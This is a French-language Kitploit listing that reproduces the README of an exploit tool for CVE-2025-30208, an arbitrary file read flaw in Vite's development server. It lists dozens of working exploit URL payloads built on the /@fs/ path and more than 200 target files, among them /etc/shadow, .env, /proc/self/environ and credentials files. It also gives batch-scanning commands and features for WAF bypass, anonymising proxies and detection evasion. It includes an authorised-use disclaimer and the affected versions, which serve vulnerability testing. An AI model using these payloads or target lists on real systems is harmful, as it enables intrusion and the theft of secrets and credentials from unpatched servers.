Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichiers de sévérité moyenne dans le serveur de développement Vite (un outil de construction frontend populaire) | Kitploit
Outils/GitHubGitHub/th-secforge/cve-2025-30208
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichiers de sévérité moyenne dans le serveur de développement Vite (un outil de construction frontend populaire)

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 Scanner de vulnérabilité de lecture arbitraire de fichiers CVE-2025-30208 pour Vite

Python License Security Status Modular

Scanner de vulnérabilité avancé pour CVE-2025-30208 avec des fonctionnalités de niveau entreprise

Outil de test d'intrusion professionnel pour la détection de la vulnérabilité de lecture arbitraire de fichiers dans Vite

🚀 Démarrage rapide • 📋 Fonctionnalités • 🔧 Utilisation • 📊 Exemples • 🛡️ Sécurité


📖 Présentation

Il s'agit d'un scanner de vulnérabilité complet conçu pour détecter et exploiter la vulnérabilité CVE-2025-30208 dans les serveurs de développement Vite. La vulnérabilité permet un accès en lecture arbitraire à des fichiers via les points de terminaison du système de fichiers de Vite, exposant potentiellement des fichiers de configuration sensibles, du code source et des informations système.

🎯 Ce que fait cet outil

  • Détecte les instances Vite vulnérables à travers les réseaux
  • Exploite la vulnérabilité de lecture arbitraire de fichiers en toute sécurité
  • Découvre les fichiers sensibles et les données de configuration
  • Rapporte les résultats dans plusieurs formats (HTML, JSON, Console)
  • Gère les sessions de scan et les configurations
  • Gère les erreurs avec élégance grâce à des mécanismes de nouvelle tentative automatique

🏗️ Architecture modulaire

L'outil dispose désormais d'une architecture modulaire pour une meilleure maintenabilité et extensibilité :

  • CVE-2025-30208.py - Application principale du scanner
  • payloads.py - Charges utiles d'exploitation avancées (60+ variations)
  • sensitive_files.py - Base de données complète de fichiers sensibles (200+ fichiers)
  • html_template.py - Modèle de rapport HTML amélioré de style hacker

🚀 Démarrage rapide

Prérequis

root@kitploit:~
pip3 install -r requirements.txt

Utilisation de base

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Fonctionnalités

🔍 Détection de vulnérabilité principale

  • 60+ charges utiles avancées : Techniques d'exploitation complètes pour une détection maximale
  • Détection intelligente : Analyse intelligente des réponses pour éviter les faux positifs
  • Validation en temps réel : Validation continue des réponses cibles
  • Tests complets : Teste tous les points de terminaison vulnérables connus

🛡️ Fonctionnalités de sécurité améliorées

  • Prise en charge des proxys : Configuration de proxy HTTP/HTTPS pour l'anonymat
  • En-têtes personnalisés : Contournement des WAF/IPS avec des en-têtes HTTP personnalisés
  • Limitation de débit : Délais configurables pour éviter la détection
  • Gestion des sessions : Sauvegarde et restauration des sessions de scan
  • Validation des entrées : Validation complète des paramètres

🔧 Capacités avancées

  • Scan par lots : Scan multi-threadé de plusieurs cibles
  • Découverte de fichiers sensibles : Découverte automatique de 200+ fichiers sensibles
  • Test de connectivité : Tests de protocoles TCP/UDP/HTTP/HTTPS
  • Récupération d'erreurs : Nouvelles tentatives automatiques avec backoff exponentiel
  • Journalisation complète : Journaux détaillés avec horodatage

📊 Rapports et sortie

  • 🎨 Rapports HTML améliorés : Beaux rapports de vulnérabilité de style hacker avec animations
  • Export JSON : Données structurées pour une analyse ultérieure
  • Sortie console : Retour d'information en temps réel avec code couleur
  • Fichiers journaux : Pistes d'audit détaillées
  • Interface Web interactive : Serveur Web intégré pour visualiser les rapports

🔧 Guide d'utilisation

1. Configuration de base

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Test de vulnérabilité

root@kitploit:~
CVE-2025-30208 > run

# Activer le mode verbeux pour une sortie détaillée
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Scan par lots

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Appuyez deux fois sur Entrée pour terminer]

4. Découverte de fichiers sensibles

root@kitploit:~
CVE-2025-30208 > scan

5. Configuration avancée

root@kitploit:~
# Configurer le proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Définir des en-têtes personnalisés
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configurer la limitation de débit
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Rapport HTML amélioré

root@kitploit:~
# Générer un beau rapport HTML
CVE-2025-30208 > pull

# Démarrer le serveur Web pour visualiser le rapport
CVE-2025-30208 > web

# Démarrer le serveur Web sur un port spécifique
CVE-2025-30208 > web 8081

# Arrêter le serveur Web
CVE-2025-30208 > web off

📊 Référence des commandes


⚙️ Options de configuration


🎨 Système de charges utiles amélioré

Le scanner utilise désormais 60+ variations de charges utiles organisées dans payloads.py :

Charges utiles principales @fs

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Variations de paramètres étendues

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Variations spécifiques à Vite

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

Variations du système de modules

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

Points de terminaison alternatifs

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 Découverte améliorée de fichiers sensibles

L'outil teste maintenant 200+ fichiers sensibles organisés dans sensitive_files.py :

🖥️ Fichiers système (Linux/Unix)

  • /etc/passwd - Informations sur les comptes utilisateurs
  • /etc/shadow - Données de mots de passe chiffrées
  • /etc/services - Services réseau
  • /etc/hosts - Mappages de noms d'hôtes
  • /etc/fstab - Tableau du système de fichiers
  • /etc/ssh/sshd_config - Configuration du serveur SSH
  • /etc/crontab - Tâches cron système
  • /etc/sudoers - Configuration sudo

📊 Informations sur les processus

  • /proc/version - Version du noyau
  • /proc/cpuinfo - Informations sur le CPU
  • /proc/meminfo - Informations sur la mémoire
  • /proc/self/environ - Environnement du processus
  • /proc/self/cmdline - Ligne de commande du processus
  • /proc/net/tcp - Connexions TCP
  • /proc/net/udp - Connexions UDP

⚙️ Configuration d'application

  • .env - Variables d'environnement
  • .env.local - Environnement local
  • .env.production - Environnement de production
  • config.json - Configuration de l'application
  • settings.json - Paramètres de l'application
  • application.properties - Configuration Spring
  • application.yml - Configuration YAML
  • database.yml - Configuration de la base de données
  • secrets.json - Gestion des secrets

📦 Fichiers Node.js / JavaScript

  • package.json - Dépendances Node.js
  • package-lock.json - Dépendances verrouillées
  • yarn.lock - Fichier de verrouillage Yarn
  • vite.config.js - Configuration Vite
  • vite.config.ts - Configuration Vite TypeScript
  • tsconfig.json - Configuration TypeScript
  • webpack.config.js - Configuration Webpack
  • next.config.js - Configuration Next.js
  • nuxt.config.js - Configuration Nuxt.js
  • angular.json - Configuration Angular
  • vue.config.js - Configuration Vue.js
  • rollup.config.js - Configuration Rollup
  • eslint.config.js - Configuration ESLint

🔧 Fichiers Git

  • .git/config - Configuration Git
  • .gitignore - Règles d'ignorance Git
  • .gitattributes - Attributs Git
  • .gitmodules - Sous-modules Git
  • .git/HEAD - Branche actuelle
  • .git/logs/HEAD - Journaux Git
  • .git/refs/heads/master - Branche master
  • .git/refs/heads/main - Branche principale

📚 Fichiers de documentation

  • README.md - Documentation du projet
  • CHANGELOG.md - Journal des modifications
  • LICENSE - Informations sur la licence
  • CONTRIBUTING.md - Directives de contribution
  • AUTHORS - Informations sur l'auteur
  • TODO.md - Liste des tâches
  • ROADMAP.md - Feuille de route du développement

🐳 Fichiers Docker

  • Dockerfile - Configuration Docker
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - Configuration de remplacement
  • .dockerignore - Règles d'ignorance Docker
  • docker-compose.prod.yml - Configuration de production
  • docker-compose.dev.yml - Configuration de développement

🌐 Configuration du serveur Web

  • nginx.conf - Configuration Nginx
  • apache2.conf - Configuration Apache
  • httpd.conf - Configuration du démon HTTP
  • .htaccess - Contrôle d'accès Apache
  • web.config - Configuration IIS
  • robots.txt - Directives pour les moteurs de recherche
  • sitemap.xml - Structure du site
  • manifest.json - Manifeste de l'application Web
  • sw.js - Service worker
  • firebase.json - Configuration Firebase
  • firebase.rules - Règles de sécurité Firebase

🪟 Fichiers Windows

  • boot.ini - Configuration de démarrage
  • autoexec.bat - Script d'exécution automatique
  • system.ini - Configuration système
  • win.ini - Configuration Windows
  • Users - Répertoires utilisateurs
  • Windows - Fichiers système
  • Program Files - Répertoires d'applications

🍎 Fichiers macOS

  • System - Fichiers système
  • Library - Fichiers de bibliothèque
  • Applications - Fichiers d'applications
  • private/etc/hosts - Fichier hosts
  • private/etc/passwd - Comptes utilisateurs

🗄️ Fichiers de base de données

  • database.db - Base de données SQLite
  • database.sqlite - Base de données SQLite
  • data.db - Base de données de données
  • dump.sql - Dump de base de données
  • schema.sql - Schéma de base de données
  • migrations - Migrations de base de données

📝 Fichiers journaux

  • logs - Répertoire des journaux
  • error.log - Journaux d'erreurs
  • access.log - Journaux d'accès
  • app.log - Journaux d'application
  • debug.log - Journaux de débogage
  • combined.log - Journaux combinés

💾 Fichiers de sauvegarde

  • backup - Répertoire de sauvegarde
  • backup.sql - Sauvegarde de base de données
  • backup.zip - Sauvegarde compressée
  • dump - Dump de données
  • export - Exportation de données

🔒 Sécurité et authentification

  • auth.json - Configuration d'authentification
  • credentials.json - Stockage d'identifiants
  • keys.json - Gestion des clés
  • tokens.json - Stockage de jetons
  • jwt.json - Configuration JWT
  • oauth.json - Configuration OAuth

🔌 Fichiers d'API et de services

  • api.json - Configuration API
  • swagger.json - Documentation API
  • openapi.json - Spécification OpenAPI
  • graphql.json - Configuration GraphQL
  • schema.json - Schéma API

☁️ Fichiers cloud et de déploiement

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Configuration Serverless
  • terraform.tf - Configuration Terraform
  • kubernetes.yml - Configuration Kubernetes
  • k8s.yml - Configuration Kubernetes

📊 Surveillance et analytique

  • analytics.json - Configuration d'analyse
  • monitoring.json - Configuration de surveillance
  • metrics.json - Configuration de métriques
  • telemetry.json - Données de télémétrie

🎨 Rapport HTML amélioré

L'outil génère maintenant de beaux rapports HTML de style hacker avec :

✨ Fonctionnalités visuelles

  • Arrière-plan de style Matrix avec des caractères animés tombants
  • Animations de dégradé et effets lumineux
  • Éléments interactifs avec effets de survol
  • Design responsive pour tous les appareils
  • Thème sombre optimisé pour les professionnels de la sécurité

📊 Statistiques interactives

  • Compteurs en temps réel pour le total des fuites et des octets exposés
  • Indicateurs de sévérité avec code couleur
  • Fonctionnalité de copie pour chaque fuite
  • Aperçu du contenu avec taille et nombre de lignes
  • Sections extensibles pour une analyse détaillée

🔧 Fonctionnalités techniques

  • Intégration Google Fonts (JetBrains Mono, Orbitron)
  • Animations CSS et transitions
  • Interactivité JavaScript pour une UX améliorée
  • Design responsive mobile
  • Compatibilité multi-navigateurs

🌐 Intégration du serveur Web

  • Serveur HTTP intégré pour visualiser les rapports
  • Ouverture automatique du navigateur
  • Options de configuration du port
  • Commandes faciles de démarrage/arrêt

🛡️ Gestion des erreurs et récupération

Mécanisme de nouvelle tentative automatique

  • 3 tentatives : Les requêtes échouées sont automatiquement relancées
  • Backoff exponentiel : Délais croissants entre les tentatives
  • Classification intelligente des erreurs : Gestion différenciée selon le type d'erreur
  • Récupération élégante : L'outil continue de fonctionner après les erreurs

Catégories d'erreurs

  • NetworkError : Problèmes de connexion, de délai d'attente, de proxy
  • ConfigurationError : Paramètres invalides
  • ValidationError : Paramètres d'entrée invalides
  • ScannerError : Erreurs générales du scanner

Fonctionnalités de validation

  • Validation d'entrée en temps réel : Tous les paramètres sont validés avant utilisation
  • Validation de configuration : Validation complète avant le scan
  • Test de connectivité : Tests de protocoles TCP/UDP/HTTP/HTTPS
  • Validation du proxy : Validation du format de l'URL du proxy

📁 Fichiers de sortie


📝 Versions affectées

🚨 Versions vulnérables

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ Versions non affectées

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ Sécurité et utilisation éthique

⚠️ Notes de sécurité importantes

  • Test autorisé uniquement : Utilisez uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite
  • Divulgation responsable : Signalez les vulnérabilités aux propriétaires du système
  • Limitation de débit : Utilisez des délais appropriés pour éviter de submerger les cibles
  • Utilisation de proxy : Envisagez d'utiliser des proxys pour l'anonymat si nécessaire
  • Conformité légale : Assurez-vous de respecter les lois et réglementations locales

🔒 Meilleures pratiques

  • Obtenez toujours une autorisation écrite avant de tester
  • Utilisez uniquement dans des environnements contrôlés
  • Documentez toutes les activités de test
  • Respectez les limites de débit et les ressources système
  • Signalez les résultats de manière responsable

🚀 Exemples d'utilisation avancée

Exemple 1 : Scan réseau complet

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

Exemple 2 : Scan furtif avec proxy

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

Exemple 3 : Flux de travail de rapport amélioré

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

Exemple 4 : Découverte de fichiers sensibles

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ Structure du projet

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # Application principale du scanner
├── payloads.py                # Charges utiles d'exploitation avancées (60+)
├── sensitive_files.py         # Base de données de fichiers sensibles (200+)
├── html_template.py           # Modèle de rapport HTML amélioré
├── README.md                  # Cette documentation
├── requirements.txt           # Dépendances Python
├── logs/                      # Répertoire des fichiers journaux
├── data_leak.html            # Rapports HTML générés
├── data_leak.json            # Rapports JSON générés
└── session.json              # Configurations de session sauvegardées

🤝 Contribution

Nous accueillons les contributions pour améliorer cet outil :

  1. Fork le dépôt
  2. Créez une branche de fonctionnalité
  3. Apportez vos modifications
  4. Testez minutieusement
  5. Soumettez une demande de tirage (pull request)

Domaines de contribution

  • Nouvelles variations de charges utiles dans payloads.py
  • Modèles de fichiers sensibles supplémentaires dans sensitive_files.py
  • Modèles HTML améliorés dans html_template.py
  • Gestion des erreurs améliorée
  • Optimisations des performances
  • Améliorations de la documentation

📄 Licence

Ce projet est sous licence uniquement à des fins de test de sécurité éducative et autorisée.

⚠️ Avertissement légal : Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins de recherche. Les utilisateurs sont responsables de s'assurer qu'ils disposent de l'autorisation appropriée avant de tester tout système. Les auteurs ne sont pas responsables de toute utilisation abusive de cet outil.


👨‍💻 Auteur

ThemeHackers

GitHub

Chercheur en sécurité & Testeur d'intrusion


⭐ Si cet outil vous a aidé, veuillez lui donner une étoile ! ⭐

Construit avec ❤️ pour la communauté de la sécurité

Télécharger l’outil
CommandeDescriptionExemple
set <option> <value>Définir les options de configurationset RHOST 192.168.1.100
show optionsAfficher les paramètres actuelsshow options
editÉditeur interactif d'optionsedit
run / exploitExécuter le test de vulnérabilitérun
batchScanner plusieurs cibles par lotsbatch
scanDécouvrir des fichiers sensiblesscan
pullExporter les résultats en HTML/JSONpull
web [on|off|port]Serveur Web pour les rapports HTMLweb 8080
saveSauvegarder la configuration de sessionsave
loadCharger la configuration de sessionload
testTester la connectivité à la cibletest
validateValider la configuration actuellevalidate
verboseActiver/désactiver le mode verbeuxverbose
proxyConfigurer les paramètres de proxyproxy
headersDéfinir des en-têtes HTTP personnalisésheaders
rateConfigurer la limitation de débitrate
logAfficher les informations de journalisationlog
help / ?Afficher l'aidehelp
exit / quitQuitter l'outilexit
OptionDescriptionValeur par défautValidation
RHOSTAdresse IP/nom d'hôte cible-Validation du nom d'hôte/IP
RPORTNuméro de port cible-Plage de ports (1-65535)
FILEPATHChemin du fichier à testeretc/passwdValidation du chemin
PROXYURL du proxy HTTP/HTTPS-Validation du format URL
VERBOSEActiver la sortie verbeusefalseValidation booléenne
RATE_LIMITDélai entre les requêtes (secondes)0.3Validation numérique
THREADSNombre de threads pour le scan par lots5Validation entière
TIMEOUTDélai d'attente des requêtes (secondes)5Validation entière
CUSTOM_HEADERSEn-têtes HTTP personnalisés (JSON){}Validation du format JSON
  • prettier.config.js - Configuration Prettier
  • jest.config.js - Configuration Jest
  • babel.config.js - Configuration Babel
  • tailwind.config.js - Configuration Tailwind CSS
  • FichierDescriptionFormat
    data_leak.htmlRapport de vulnérabilité HTML de style hacker amélioréHTML
    data_leak.jsonExport JSON structuréJSON
    sensitive_files_discovery.jsonFichiers sensibles découvertsJSON
    session.jsonConfiguration de session sauvegardéeJSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.logJournaux d'audit détaillésTexte